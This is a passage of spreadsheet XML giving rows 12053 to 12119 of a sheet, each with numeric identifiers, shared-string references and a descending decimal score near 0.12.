    <row r="12053" ht="15.75" customHeight="1">
      <c r="A12053" s="1">
        <v>2930.0</v>
      </c>
      <c r="B12053" s="2">
        <v>3.5910242E7</v>
      </c>
      <c r="C12053" s="2" t="s">
        <v>11575</v>
      </c>
      <c r="D12053" s="2">
        <v>1.0</v>
      </c>
      <c r="E12053" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12053" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="12054" ht="15.75" customHeight="1">
      <c r="A12054" s="1">
        <v>3027.0</v>
      </c>
      <c r="B12054" s="2">
        <v>3.6437067E7</v>
      </c>
      <c r="C12054" s="2" t="s">
        <v>11576</v>
      </c>
      <c r="D12054" s="2">
        <v>1.0</v>
      </c>
      <c r="E12054" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12054" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="12055" ht="15.75" customHeight="1">
      <c r="A12055" s="1">
        <v>4678.0</v>
      </c>
      <c r="B12055" s="2">
        <v>4.3179143E7</v>
      </c>
      <c r="C12055" s="2" t="s">
        <v>11577</v>
      </c>
      <c r="D12055" s="2">
        <v>1.0</v>
      </c>
      <c r="E12055" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12055" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="12056" ht="15.75" customHeight="1">
      <c r="A12056" s="1">
        <v>9548.0</v>
      </c>
      <c r="B12056" s="2">
        <v>5.6027387E7</v>
      </c>
      <c r="C12056" s="2" t="s">
        <v>11578</v>
      </c>
      <c r="D12056" s="2">
        <v>1.0</v>
      </c>
      <c r="E12056" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12056" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="12057" ht="15.75" customHeight="1">
      <c r="A12057" s="1">
        <v>9994.0</v>
      </c>
      <c r="B12057" s="2">
        <v>5.6988134E7</v>
      </c>
      <c r="C12057" s="2" t="s">
        <v>11579</v>
      </c>
      <c r="D12057" s="2">
        <v>1.0</v>
      </c>
      <c r="E12057" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12057" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="12058" ht="15.75" customHeight="1">
      <c r="A12058" s="1">
        <v>32579.0</v>
      </c>
      <c r="B12058" s="2">
        <v>5780327.0</v>
      </c>
      <c r="C12058" s="2" t="s">
        <v>11580</v>
      </c>
      <c r="D12058" s="2">
        <v>1.0</v>
      </c>
      <c r="E12058" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12058" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="12059" ht="15.75" customHeight="1">
      <c r="A12059" s="1">
        <v>1058.0</v>
      </c>
      <c r="B12059" s="2">
        <v>2.3454521E7</v>
      </c>
      <c r="C12059" s="2" t="s">
        <v>11581</v>
      </c>
      <c r="D12059" s="2">
        <v>1.0</v>
      </c>
      <c r="E12059" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12059" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12060" ht="15.75" customHeight="1">
      <c r="A12060" s="1">
        <v>4075.0</v>
      </c>
      <c r="B12060" s="2">
        <v>4.1176026E7</v>
      </c>
      <c r="C12060" s="2" t="s">
        <v>11582</v>
      </c>
      <c r="D12060" s="2">
        <v>1.0</v>
      </c>
      <c r="E12060" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12060" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12061" ht="15.75" customHeight="1">
      <c r="A12061" s="1">
        <v>4431.0</v>
      </c>
      <c r="B12061" s="2">
        <v>4.2345527E7</v>
      </c>
      <c r="C12061" s="2" t="s">
        <v>11583</v>
      </c>
      <c r="D12061" s="2">
        <v>1.0</v>
      </c>
      <c r="E12061" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12061" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12062" ht="15.75" customHeight="1">
      <c r="A12062" s="1">
        <v>4506.0</v>
      </c>
      <c r="B12062" s="2">
        <v>4.2579141E7</v>
      </c>
      <c r="C12062" s="2" t="s">
        <v>11584</v>
      </c>
      <c r="D12062" s="2">
        <v>1.0</v>
      </c>
      <c r="E12062" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12062" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12063" ht="15.75" customHeight="1">
      <c r="A12063" s="1">
        <v>4819.0</v>
      </c>
      <c r="B12063" s="2">
        <v>4.3606E7</v>
      </c>
      <c r="C12063" s="2" t="s">
        <v>11585</v>
      </c>
      <c r="D12063" s="2">
        <v>1.0</v>
      </c>
      <c r="E12063" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12063" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12064" ht="15.75" customHeight="1">
      <c r="A12064" s="1">
        <v>5562.0</v>
      </c>
      <c r="B12064" s="2">
        <v>4.5989244E7</v>
      </c>
      <c r="C12064" s="2" t="s">
        <v>11586</v>
      </c>
      <c r="D12064" s="2">
        <v>1.0</v>
      </c>
      <c r="E12064" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12064" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12065" ht="15.75" customHeight="1">
      <c r="A12065" s="1">
        <v>5754.0</v>
      </c>
      <c r="B12065" s="2">
        <v>4.6666445E7</v>
      </c>
      <c r="C12065" s="2" t="s">
        <v>11587</v>
      </c>
      <c r="D12065" s="2">
        <v>1.0</v>
      </c>
      <c r="E12065" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12065" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12066" ht="15.75" customHeight="1">
      <c r="A12066" s="1">
        <v>7046.0</v>
      </c>
      <c r="B12066" s="2">
        <v>5.0153322E7</v>
      </c>
      <c r="C12066" s="2" t="s">
        <v>11588</v>
      </c>
      <c r="D12066" s="2">
        <v>1.0</v>
      </c>
      <c r="E12066" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12066" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12067" ht="15.75" customHeight="1">
      <c r="A12067" s="1">
        <v>7208.0</v>
      </c>
      <c r="B12067" s="2">
        <v>5.0596052E7</v>
      </c>
      <c r="C12067" s="2" t="s">
        <v>11589</v>
      </c>
      <c r="D12067" s="2">
        <v>1.0</v>
      </c>
      <c r="E12067" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12067" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12068" ht="15.75" customHeight="1">
      <c r="A12068" s="1">
        <v>7915.0</v>
      </c>
      <c r="B12068" s="2">
        <v>5.2502515E7</v>
      </c>
      <c r="C12068" s="2" t="s">
        <v>11590</v>
      </c>
      <c r="D12068" s="2">
        <v>1.0</v>
      </c>
      <c r="E12068" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12068" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12069" ht="15.75" customHeight="1">
      <c r="A12069" s="1">
        <v>8100.0</v>
      </c>
      <c r="B12069" s="2">
        <v>5.3060119E7</v>
      </c>
      <c r="C12069" s="2" t="s">
        <v>11591</v>
      </c>
      <c r="D12069" s="2">
        <v>1.0</v>
      </c>
      <c r="E12069" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12069" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12070" ht="15.75" customHeight="1">
      <c r="A12070" s="1">
        <v>9728.0</v>
      </c>
      <c r="B12070" s="2">
        <v>5.6443088E7</v>
      </c>
      <c r="C12070" s="2" t="s">
        <v>11592</v>
      </c>
      <c r="D12070" s="2">
        <v>1.0</v>
      </c>
      <c r="E12070" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12070" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12071" ht="15.75" customHeight="1">
      <c r="A12071" s="1">
        <v>10926.0</v>
      </c>
      <c r="B12071" s="2">
        <v>1.6859605E7</v>
      </c>
      <c r="C12071" s="2" t="s">
        <v>11593</v>
      </c>
      <c r="D12071" s="2">
        <v>1.0</v>
      </c>
      <c r="E12071" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12071" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12072" ht="15.75" customHeight="1">
      <c r="A12072" s="1">
        <v>10936.0</v>
      </c>
      <c r="B12072" s="2">
        <v>1.6975301E7</v>
      </c>
      <c r="C12072" s="2" t="s">
        <v>11594</v>
      </c>
      <c r="D12072" s="2">
        <v>1.0</v>
      </c>
      <c r="E12072" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12072" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12073" ht="15.75" customHeight="1">
      <c r="A12073" s="1">
        <v>13641.0</v>
      </c>
      <c r="B12073" s="2">
        <v>3.5912905E7</v>
      </c>
      <c r="C12073" s="2" t="s">
        <v>11595</v>
      </c>
      <c r="D12073" s="2">
        <v>1.0</v>
      </c>
      <c r="E12073" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12073" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12074" ht="15.75" customHeight="1">
      <c r="A12074" s="1">
        <v>15342.0</v>
      </c>
      <c r="B12074" s="2">
        <v>4.2614387E7</v>
      </c>
      <c r="C12074" s="2" t="s">
        <v>11596</v>
      </c>
      <c r="D12074" s="2">
        <v>1.0</v>
      </c>
      <c r="E12074" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12074" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12075" ht="15.75" customHeight="1">
      <c r="A12075" s="1">
        <v>16842.0</v>
      </c>
      <c r="B12075" s="2">
        <v>4.7908739E7</v>
      </c>
      <c r="C12075" s="2" t="s">
        <v>11597</v>
      </c>
      <c r="D12075" s="2">
        <v>1.0</v>
      </c>
      <c r="E12075" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12075" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12076" ht="15.75" customHeight="1">
      <c r="A12076" s="1">
        <v>17189.0</v>
      </c>
      <c r="B12076" s="2">
        <v>4.8920138E7</v>
      </c>
      <c r="C12076" s="2" t="s">
        <v>11598</v>
      </c>
      <c r="D12076" s="2">
        <v>1.0</v>
      </c>
      <c r="E12076" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12076" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12077" ht="15.75" customHeight="1">
      <c r="A12077" s="1">
        <v>17266.0</v>
      </c>
      <c r="B12077" s="2">
        <v>4.9163201E7</v>
      </c>
      <c r="C12077" s="2" t="s">
        <v>11599</v>
      </c>
      <c r="D12077" s="2">
        <v>1.0</v>
      </c>
      <c r="E12077" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12077" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12078" ht="15.75" customHeight="1">
      <c r="A12078" s="1">
        <v>17327.0</v>
      </c>
      <c r="B12078" s="2">
        <v>4.9356865E7</v>
      </c>
      <c r="C12078" s="2" t="s">
        <v>11600</v>
      </c>
      <c r="D12078" s="2">
        <v>1.0</v>
      </c>
      <c r="E12078" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12078" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12079" ht="15.75" customHeight="1">
      <c r="A12079" s="1">
        <v>18421.0</v>
      </c>
      <c r="B12079" s="2">
        <v>5.269047E7</v>
      </c>
      <c r="C12079" s="2" t="s">
        <v>11601</v>
      </c>
      <c r="D12079" s="2">
        <v>1.0</v>
      </c>
      <c r="E12079" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12079" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12080" ht="15.75" customHeight="1">
      <c r="A12080" s="1">
        <v>19166.0</v>
      </c>
      <c r="B12080" s="2">
        <v>5.4928566E7</v>
      </c>
      <c r="C12080" s="2" t="s">
        <v>11602</v>
      </c>
      <c r="D12080" s="2">
        <v>1.0</v>
      </c>
      <c r="E12080" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12080" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12081" ht="15.75" customHeight="1">
      <c r="A12081" s="1">
        <v>19354.0</v>
      </c>
      <c r="B12081" s="2">
        <v>5.5409549E7</v>
      </c>
      <c r="C12081" s="2" t="s">
        <v>11603</v>
      </c>
      <c r="D12081" s="2">
        <v>1.0</v>
      </c>
      <c r="E12081" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12081" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12082" ht="15.75" customHeight="1">
      <c r="A12082" s="1">
        <v>19374.0</v>
      </c>
      <c r="B12082" s="2">
        <v>5.5482878E7</v>
      </c>
      <c r="C12082" s="2" t="s">
        <v>11604</v>
      </c>
      <c r="D12082" s="2">
        <v>1.0</v>
      </c>
      <c r="E12082" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12082" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12083" ht="15.75" customHeight="1">
      <c r="A12083" s="1">
        <v>21814.0</v>
      </c>
      <c r="B12083" s="2">
        <v>2.686158E7</v>
      </c>
      <c r="C12083" s="2" t="s">
        <v>11605</v>
      </c>
      <c r="D12083" s="2">
        <v>1.0</v>
      </c>
      <c r="E12083" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12083" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12084" ht="15.75" customHeight="1">
      <c r="A12084" s="1">
        <v>22723.0</v>
      </c>
      <c r="B12084" s="2">
        <v>4.3577329E7</v>
      </c>
      <c r="C12084" s="2" t="s">
        <v>11606</v>
      </c>
      <c r="D12084" s="2">
        <v>1.0</v>
      </c>
      <c r="E12084" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12084" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12085" ht="15.75" customHeight="1">
      <c r="A12085" s="1">
        <v>23731.0</v>
      </c>
      <c r="B12085" s="2">
        <v>7270759.0</v>
      </c>
      <c r="C12085" s="2" t="s">
        <v>11607</v>
      </c>
      <c r="D12085" s="2">
        <v>1.0</v>
      </c>
      <c r="E12085" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12085" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12086" ht="15.75" customHeight="1">
      <c r="A12086" s="1">
        <v>24920.0</v>
      </c>
      <c r="B12086" s="2">
        <v>1.2383239E7</v>
      </c>
      <c r="C12086" s="2" t="s">
        <v>11608</v>
      </c>
      <c r="D12086" s="2">
        <v>1.0</v>
      </c>
      <c r="E12086" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12086" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12087" ht="15.75" customHeight="1">
      <c r="A12087" s="1">
        <v>28105.0</v>
      </c>
      <c r="B12087" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C12087" s="2" t="s">
        <v>11609</v>
      </c>
      <c r="D12087" s="2">
        <v>1.0</v>
      </c>
      <c r="E12087" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12087" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12088" ht="15.75" customHeight="1">
      <c r="A12088" s="1">
        <v>28548.0</v>
      </c>
      <c r="B12088" s="2">
        <v>2.6861579E7</v>
      </c>
      <c r="C12088" s="2" t="s">
        <v>11610</v>
      </c>
      <c r="D12088" s="2">
        <v>1.0</v>
      </c>
      <c r="E12088" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12088" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12089" ht="15.75" customHeight="1">
      <c r="A12089" s="1">
        <v>31574.0</v>
      </c>
      <c r="B12089" s="2">
        <v>5124515.0</v>
      </c>
      <c r="C12089" s="2" t="s">
        <v>11611</v>
      </c>
      <c r="D12089" s="2">
        <v>1.0</v>
      </c>
      <c r="E12089" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12089" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12090" ht="15.75" customHeight="1">
      <c r="A12090" s="1">
        <v>33125.0</v>
      </c>
      <c r="B12090" s="2">
        <v>7020050.0</v>
      </c>
      <c r="C12090" s="2" t="s">
        <v>11612</v>
      </c>
      <c r="D12090" s="2">
        <v>1.0</v>
      </c>
      <c r="E12090" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12090" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="12091" ht="15.75" customHeight="1">
      <c r="A12091" s="1">
        <v>866.0</v>
      </c>
      <c r="B12091" s="2">
        <v>2.1831955E7</v>
      </c>
      <c r="C12091" s="2" t="s">
        <v>11613</v>
      </c>
      <c r="D12091" s="2">
        <v>1.0</v>
      </c>
      <c r="E12091" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12091" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="12092" ht="15.75" customHeight="1">
      <c r="A12092" s="1">
        <v>11561.0</v>
      </c>
      <c r="B12092" s="2">
        <v>2.2723785E7</v>
      </c>
      <c r="C12092" s="2" t="s">
        <v>11614</v>
      </c>
      <c r="D12092" s="2">
        <v>1.0</v>
      </c>
      <c r="E12092" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12092" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="12093" ht="15.75" customHeight="1">
      <c r="A12093" s="1">
        <v>13733.0</v>
      </c>
      <c r="B12093" s="2">
        <v>3.6419187E7</v>
      </c>
      <c r="C12093" s="2" t="s">
        <v>11615</v>
      </c>
      <c r="D12093" s="2">
        <v>1.0</v>
      </c>
      <c r="E12093" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12093" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="12094" ht="15.75" customHeight="1">
      <c r="A12094" s="1">
        <v>24955.0</v>
      </c>
      <c r="B12094" s="2">
        <v>1.2598405E7</v>
      </c>
      <c r="C12094" s="2" t="s">
        <v>11616</v>
      </c>
      <c r="D12094" s="2">
        <v>1.0</v>
      </c>
      <c r="E12094" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12094" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="12095" ht="15.75" customHeight="1">
      <c r="A12095" s="1">
        <v>30323.0</v>
      </c>
      <c r="B12095" s="2">
        <v>3.8056388E7</v>
      </c>
      <c r="C12095" s="2" t="s">
        <v>11617</v>
      </c>
      <c r="D12095" s="2">
        <v>1.0</v>
      </c>
      <c r="E12095" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12095" s="2">
        <v>0.1233521657250471</v>
      </c>
    </row>
    <row r="12096" ht="15.75" customHeight="1">
      <c r="A12096" s="1">
        <v>9659.0</v>
      </c>
      <c r="B12096" s="2">
        <v>5.6297503E7</v>
      </c>
      <c r="C12096" s="2" t="s">
        <v>11618</v>
      </c>
      <c r="D12096" s="2">
        <v>1.0</v>
      </c>
      <c r="E12096" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12096" s="2">
        <v>0.1231481481481481</v>
      </c>
    </row>
    <row r="12097" ht="15.75" customHeight="1">
      <c r="A12097" s="1">
        <v>3557.0</v>
      </c>
      <c r="B12097" s="2">
        <v>3.8815682E7</v>
      </c>
      <c r="C12097" s="2" t="s">
        <v>11619</v>
      </c>
      <c r="D12097" s="2">
        <v>1.0</v>
      </c>
      <c r="E12097" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12097" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="12098" ht="15.75" customHeight="1">
      <c r="A12098" s="1">
        <v>16327.0</v>
      </c>
      <c r="B12098" s="2">
        <v>4.5993988E7</v>
      </c>
      <c r="C12098" s="2" t="s">
        <v>11620</v>
      </c>
      <c r="D12098" s="2">
        <v>1.0</v>
      </c>
      <c r="E12098" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12098" s="2">
        <v>0.1224279835390946</v>
      </c>
    </row>
    <row r="12099" ht="15.75" customHeight="1">
      <c r="A12099" s="1">
        <v>26336.0</v>
      </c>
      <c r="B12099" s="2">
        <v>1.6743195E7</v>
      </c>
      <c r="C12099" s="2" t="s">
        <v>11621</v>
      </c>
      <c r="D12099" s="2">
        <v>1.0</v>
      </c>
      <c r="E12099" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12099" s="2">
        <v>0.1222222222222223</v>
      </c>
    </row>
    <row r="12100" ht="15.75" customHeight="1">
      <c r="A12100" s="1">
        <v>6791.0</v>
      </c>
      <c r="B12100" s="2">
        <v>4.9500361E7</v>
      </c>
      <c r="C12100" s="2" t="s">
        <v>11622</v>
      </c>
      <c r="D12100" s="2">
        <v>1.0</v>
      </c>
      <c r="E12100" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12100" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="12101" ht="15.75" customHeight="1">
      <c r="A12101" s="1">
        <v>29210.0</v>
      </c>
      <c r="B12101" s="2">
        <v>3.0778497E7</v>
      </c>
      <c r="C12101" s="2" t="s">
        <v>11623</v>
      </c>
      <c r="D12101" s="2">
        <v>1.0</v>
      </c>
      <c r="E12101" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12101" s="2">
        <v>0.1222222222222222</v>
      </c>
    </row>
    <row r="12102" ht="15.75" customHeight="1">
      <c r="A12102" s="1">
        <v>4838.0</v>
      </c>
      <c r="B12102" s="2">
        <v>4.3681363E7</v>
      </c>
      <c r="C12102" s="2" t="s">
        <v>11624</v>
      </c>
      <c r="D12102" s="2">
        <v>1.0</v>
      </c>
      <c r="E12102" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12102" s="2">
        <v>0.1220538720538721</v>
      </c>
    </row>
    <row r="12103" ht="15.75" customHeight="1">
      <c r="A12103" s="1">
        <v>18634.0</v>
      </c>
      <c r="B12103" s="2">
        <v>5.3383629E7</v>
      </c>
      <c r="C12103" s="2" t="s">
        <v>11625</v>
      </c>
      <c r="D12103" s="2">
        <v>1.0</v>
      </c>
      <c r="E12103" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12103" s="2">
        <v>0.1220538720538721</v>
      </c>
    </row>
    <row r="12104" ht="15.75" customHeight="1">
      <c r="A12104" s="1">
        <v>6002.0</v>
      </c>
      <c r="B12104" s="2">
        <v>4.7461853E7</v>
      </c>
      <c r="C12104" s="2" t="s">
        <v>11626</v>
      </c>
      <c r="D12104" s="2">
        <v>1.0</v>
      </c>
      <c r="E12104" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12104" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="12105" ht="15.75" customHeight="1">
      <c r="A12105" s="1">
        <v>6072.0</v>
      </c>
      <c r="B12105" s="2">
        <v>4.7627938E7</v>
      </c>
      <c r="C12105" s="2" t="s">
        <v>11627</v>
      </c>
      <c r="D12105" s="2">
        <v>1.0</v>
      </c>
      <c r="E12105" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12105" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="12106" ht="15.75" customHeight="1">
      <c r="A12106" s="1">
        <v>6841.0</v>
      </c>
      <c r="B12106" s="2">
        <v>4.9622184E7</v>
      </c>
      <c r="C12106" s="2" t="s">
        <v>11628</v>
      </c>
      <c r="D12106" s="2">
        <v>1.0</v>
      </c>
      <c r="E12106" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12106" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="12107" ht="15.75" customHeight="1">
      <c r="A12107" s="1">
        <v>16072.0</v>
      </c>
      <c r="B12107" s="2">
        <v>4.5327034E7</v>
      </c>
      <c r="C12107" s="2" t="s">
        <v>11629</v>
      </c>
      <c r="D12107" s="2">
        <v>1.0</v>
      </c>
      <c r="E12107" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12107" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="12108" ht="15.75" customHeight="1">
      <c r="A12108" s="1">
        <v>17881.0</v>
      </c>
      <c r="B12108" s="2">
        <v>5.10425E7</v>
      </c>
      <c r="C12108" s="2" t="s">
        <v>11630</v>
      </c>
      <c r="D12108" s="2">
        <v>1.0</v>
      </c>
      <c r="E12108" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12108" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="12109" ht="15.75" customHeight="1">
      <c r="A12109" s="1">
        <v>27496.0</v>
      </c>
      <c r="B12109" s="2">
        <v>2.2067601E7</v>
      </c>
      <c r="C12109" s="2" t="s">
        <v>11631</v>
      </c>
      <c r="D12109" s="2">
        <v>1.0</v>
      </c>
      <c r="E12109" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12109" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="12110" ht="15.75" customHeight="1">
      <c r="A12110" s="1">
        <v>33379.0</v>
      </c>
      <c r="B12110" s="2">
        <v>7643939.0</v>
      </c>
      <c r="C12110" s="2" t="s">
        <v>11632</v>
      </c>
      <c r="D12110" s="2">
        <v>1.0</v>
      </c>
      <c r="E12110" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12110" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="12111" ht="15.75" customHeight="1">
      <c r="A12111" s="1">
        <v>34041.0</v>
      </c>
      <c r="B12111" s="2">
        <v>9575406.0</v>
      </c>
      <c r="C12111" s="2" t="s">
        <v>11633</v>
      </c>
      <c r="D12111" s="2">
        <v>1.0</v>
      </c>
      <c r="E12111" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12111" s="2">
        <v>0.1220238095238095</v>
      </c>
    </row>
    <row r="12112" ht="15.75" customHeight="1">
      <c r="A12112" s="1">
        <v>1198.0</v>
      </c>
      <c r="B12112" s="2">
        <v>2.4742391E7</v>
      </c>
      <c r="C12112" s="2" t="s">
        <v>11634</v>
      </c>
      <c r="D12112" s="2">
        <v>1.0</v>
      </c>
      <c r="E12112" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12112" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="12113" ht="15.75" customHeight="1">
      <c r="A12113" s="1">
        <v>13284.0</v>
      </c>
      <c r="B12113" s="2">
        <v>3.4427767E7</v>
      </c>
      <c r="C12113" s="2" t="s">
        <v>11635</v>
      </c>
      <c r="D12113" s="2">
        <v>1.0</v>
      </c>
      <c r="E12113" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12113" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="12114" ht="15.75" customHeight="1">
      <c r="A12114" s="1">
        <v>16149.0</v>
      </c>
      <c r="B12114" s="2">
        <v>4.5577183E7</v>
      </c>
      <c r="C12114" s="2" t="s">
        <v>11636</v>
      </c>
      <c r="D12114" s="2">
        <v>1.0</v>
      </c>
      <c r="E12114" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12114" s="2">
        <v>0.1218905472636816</v>
      </c>
    </row>
    <row r="12115" ht="15.75" customHeight="1">
      <c r="A12115" s="1">
        <v>10103.0</v>
      </c>
      <c r="B12115" s="2">
        <v>5.7221914E7</v>
      </c>
      <c r="C12115" s="2" t="s">
        <v>11637</v>
      </c>
      <c r="D12115" s="2">
        <v>1.0</v>
      </c>
      <c r="E12115" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12115" s="2">
        <v>0.121832358674464</v>
      </c>
    </row>
    <row r="12116" ht="15.75" customHeight="1">
      <c r="A12116" s="1">
        <v>14632.0</v>
      </c>
      <c r="B12116" s="2">
        <v>4.0305905E7</v>
      </c>
      <c r="C12116" s="2" t="s">
        <v>11638</v>
      </c>
      <c r="D12116" s="2">
        <v>1.0</v>
      </c>
      <c r="E12116" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12116" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="12117" ht="15.75" customHeight="1">
      <c r="A12117" s="1">
        <v>17636.0</v>
      </c>
      <c r="B12117" s="2">
        <v>5.0389556E7</v>
      </c>
      <c r="C12117" s="2" t="s">
        <v>11639</v>
      </c>
      <c r="D12117" s="2">
        <v>1.0</v>
      </c>
      <c r="E12117" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12117" s="2">
        <v>0.1218323586744639</v>
      </c>
    </row>
    <row r="12118" ht="15.75" customHeight="1">
      <c r="A12118" s="1">
        <v>25562.0</v>
      </c>
      <c r="B12118" s="2">
        <v>1.4298529E7</v>
      </c>
      <c r="C12118" s="2" t="s">
        <v>11640</v>
      </c>
      <c r="D12118" s="2">
        <v>1.0</v>
      </c>
      <c r="E12118" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12118" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
    <row r="12119" ht="15.75" customHeight="1">
      <c r="A12119" s="1">
        <v>31841.0</v>
      </c>
      <c r="B12119" s="2">
        <v>5.2728222E7</v>
      </c>
      <c r="C12119" s="2" t="s">
        <v>11641</v>
      </c>
      <c r="D12119" s="2">
        <v>1.0</v>
      </c>
      <c r="E12119" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F12119" s="2">
        <v>0.1216475095785441</v>
      </c>
    </row>
